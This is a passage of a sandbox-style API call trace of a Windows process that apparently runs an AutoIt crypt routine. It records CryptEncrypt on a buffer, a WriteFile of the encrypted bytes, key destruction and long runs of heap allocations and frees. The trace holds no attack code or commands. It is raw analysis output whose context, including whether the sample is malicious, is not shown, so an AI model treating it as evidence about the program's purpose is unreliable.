(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cad18 [0117.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.837] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4522bf8*, pdwDataLen=0x144e538*=0x43ef, dwBufLen=0x43f0 | out: pbData=0x4522bf8*, pdwDataLen=0x144e538*=0x43f0) returned 1 [0117.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0117.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0117.838] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.838] WriteFile (in: hFile=0x298, lpBuffer=0x4537fe0*, nNumberOfBytesToWrite=0x43f0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4537fe0*, lpNumberOfBytesWritten=0x144ef3c*=0x43f0, lpOverlapped=0x0) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4537fe0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.840] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0117.840] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.840] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.841] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0117.841] CryptDestroyKey (hKey=0x41ac640) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.842] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.843] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.843] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0117.843] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.843] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.843] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0117.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0117.844] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.844] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.845] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.845] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.846] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.846] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.846] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0117.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 